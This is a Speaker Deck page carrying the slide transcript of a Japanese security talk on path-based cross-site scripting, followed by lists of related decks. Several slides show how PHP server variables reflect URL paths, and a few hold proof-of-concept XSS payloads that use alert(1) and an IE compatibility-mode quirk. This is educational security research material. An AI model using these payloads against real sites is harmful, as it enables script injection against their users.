Upgrade to Pro — share decks privately, control downloads, hide ads and more …

明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7

Avatar for Masato Kinugawa Masato Kinugawa
March 29, 2016
Technology
14
28k

明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7

Shibuya.XSS techtalk #7 の資料です。
Avatar for Masato Kinugawa

Masato Kinugawa

March 29, 2016
Tweet

More Decks by Masato Kinugawa

See All by Masato Kinugawa
ブラウザのレガシー・独自機能を愛でる-Firefoxの脆弱性4選- / Browser Crash Club #1
Avatar for Masato Kinugawa masatokinugawa
1
700
注目したいクライアントサイドの脆弱性2選/ Security.Tokyo #3
Avatar for Masato Kinugawa masatokinugawa
8
3.7k
バグハンティングのすゝめ / P3NFEST
Avatar for Masato Kinugawa masatokinugawa
5
2.3k
Pwn2OwnでMicrosoft Teamsをハッキングして2000万円を獲得した方法/ Shibuya.XSS techtalk #12
Avatar for Masato Kinugawa masatokinugawa
13
19k
How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
Avatar for Masato Kinugawa masatokinugawa
1
22k
JSでDoSる/ Shibuya.XSS techtalk #11
Avatar for Masato Kinugawa masatokinugawa
20
6.9k
Electron: Abusing the lack of context isolation - CureCon(en)
Avatar for Masato Kinugawa masatokinugawa
5
99k
Electron: Context Isolationの欠如を利用した任意コード実行 / Electron: Abusing the lack of context isolation - CureCon(ja)
Avatar for Masato Kinugawa masatokinugawa
9
26k
バグハンターが見てきたBug Bountyの7年 / LINE Developer Meetup #34 Security Bug Bounty
Avatar for Masato Kinugawa masatokinugawa
18
12k

Other Decks in Technology

See All in Technology
マルチテナント+マルチプロダクト SaaS への AI Agent の組み込み方
Avatar for KNOWLEDGE WORK / 株式会社ナレッジワーク kworkdev
PRO
2
390
Kotlinで学ぶ 代数的データ型
Avatar for Kanon ysknsid25
5
1.1k
評価の納得感を2段階高める「構造化フィードバック」
Avatar for あろえ aloerina
1
260
Autonomous Database サービス・アップデート (FY25)
Avatar for oracle4engineer oracle4engineer
PRO
2
780
從四件事帶你見識見識 事件驅動架構設計 (EDA)
Avatar for LINE Developers Taiwan line_developers_tw
PRO
0
160
Create a Rails8 responsive app with Gemini and RubyLLM
Avatar for Riccardo Carlesso palladius
0
130
エンジニア採用から始まる技術広報と組織づくり/202506lt
Avatar for Ichiro Nishiuma nishiuma
8
1.7k
原則から考える保守しやすいComposable関数設計
Avatar for Mori Atsushi moriatsushi
3
480
Claude Code どこまでも/ Claude Code Everywhere
Avatar for nwiizo nwiizo
50
30k
AWS全冠したので振りかえってみる
Avatar for tajimon tajimon
0
150
型システムを知りたい人のための型検査器作成入門
Avatar for Yusuke Endoh mame
15
3.9k
「どこにある?」の解決。生成AI(RAG)で効率化するガバメントクラウド運用
Avatar for Toru_Kubota toru_kubota
2
450

Featured

See All Featured
The Straight Up "How To Draw Better" Workshop
Avatar for Dennis Kardys denniskardys
233
140k
10 Git Anti Patterns You Should be Aware of
Avatar for Lemi Orhan Ergin lemiorhan
PRO
657
60k
Save Time (by Creating Custom Rails Generators)
Avatar for Garrett Dimon garrettdimon
PRO
31
1.2k
A Tale of Four Properties
Avatar for Chris Coyier chriscoyier
159
23k
Testing 201, or: Great Expectations
Avatar for Joseph Mastey jmmastey
42
7.5k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
Avatar for Joe Casabona jcasabona
32
2.3k
A designer walks into a library…
Avatar for Paul Jervis Heath pauljervisheath
206
24k
YesSQL, Process and Tooling at Scale
Avatar for Rocio Delgado rocio
172
14k
Bash Introduction
Avatar for André Augusto Costa Santos 62gerente
614
210k
"I'm Feeling Lucky" - Building Great Search Experiences for Today's Users (#IAC19)
Avatar for Dan Newman danielanewman
228
22k
The Pragmatic Product Professional
Avatar for Laura Van Doore lauravandoore
35
6.7k
ReactJS: Keep Simple. Everything can be a component!
Avatar for Pedro Nauck pedronauck
667
120k

Transcript

  1. None
  2. None
  3. None
  4. None
  5. None

  6. https://host/tags/aaa/ ... </head> <body> <form> <input type="text" value="aaa"> ...

  7. ... </head> <meta property="og:url" content="https://host/path/index"> <body> ... https://host/path/index?p=1

  8. ... </head> <meta property="og:url" content="https://host/path/index;aaa"> <body> ... https://host/path/index;aaa?p=1

  9. None

  10. http://php.net/index.php http://php.net/index.php/xxx/yyy/zzz

  11. http://shibuyaxss.connpass.com/event/28232/ http://shibuyaxss.connpass.com/event/28232/;abc

  12. None

  13. SCRIPT_URL /test.php/<b>PATH</b> SCRIPT_URI http://localhost/test.php/<b>PATH</b> PATH_INFO /<b>PATH</b> PATH_TRANSLATED \<b>PATH<\b> PHP_SELF /test.php/<b>PATH</b>

  14. GET /path?query HTTP/1.1 http://php.net/manual/ja/reserved.variables.server.php

  15. /test.php/<b>PATH</b>?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?%3Cb%3EQUERY% 3C/b%3E HTTP/1.1 QUERY_STRING %3Cb%3EQUERY%3C/b%3E REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E? %3Cb%3EQUERY%3C/b%3E

    http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>

  16. /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> HTTP/1.1 QUERY_STRING <b>QUERY</b> REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>

  17. http://localhost/test.php/<b>PATH</b> GET /test.php/<b>PATH</b> HTTP/1.1

  18. /test.php/%3Cb%3EPATH%3C/b%3E GET /test.php/<b>PATH</b> HTTP/1.1 REQUEST_URI /test.php/<b>PATH</b> location.pathname /test.php/%3Cb%3EPATH%3C/b%3E http://localhost/test.php/<b>PATH</b>

  19. None
  20. None
  21. None
  22. None
  23. None
  24. None
  25. None
  26. None
  27. None
  28. None
  29. None
  30. None
  31. None
  32. None
  33. None

  34. HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 X-UA-Compatible: IE=9 <head> <meta

    http-equiv="X-UA-Compatible" content="IE=9"> </head>

  35. <svg> <circle cx="100" cy="100" r="50" fill="red"/> </svg>

  36. ifr=document.createElement('<iframe onload=alert(1)>'); document.body.appendChild(ifr); InvalidCharacterError

  37. <meta http-equiv="X-UA-Compatible" content="IE=9"> <script> console.log(document.documentMode) /* 9 */ </script> <iframe

    src=//victim/></iframe> http://blogs.msdn.com/cfs-filesystemfile.ashx/__key/communityserver-blogs-components- weblogfiles/00-00-01-35-07/3073.IE_5F00_chart_5F00_jp.pdf

  38. <meta http-equiv="X-UA-Compatible" content="IE=9"> <embed src="http://shibuya.vulnerabledoma.in/javascript:alert(1)/% 2F..%2F..%2Fjizen2#hash"></embed>

  39. <script src="//ajax.googleapis.com/ajax/libs/jquerymobile/1.4.5/jquery.mobile.min.js"> </script>

  40. None
  41. None
  42. None
  43. None
  44. None
  45. None
  46. None
  47. None
  48. None
  49. None
  50. None
  51. None
  52. None